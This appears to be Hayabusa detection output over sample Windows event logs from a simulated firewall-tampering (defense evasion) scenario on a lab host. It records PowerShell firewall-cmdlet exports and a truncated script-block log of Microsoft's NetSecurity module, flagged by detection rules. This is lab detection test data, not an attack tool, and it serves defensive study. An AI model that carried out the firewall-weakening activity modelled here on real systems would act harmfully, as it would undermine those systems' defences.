value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.656 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.658 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.659 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.660 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { 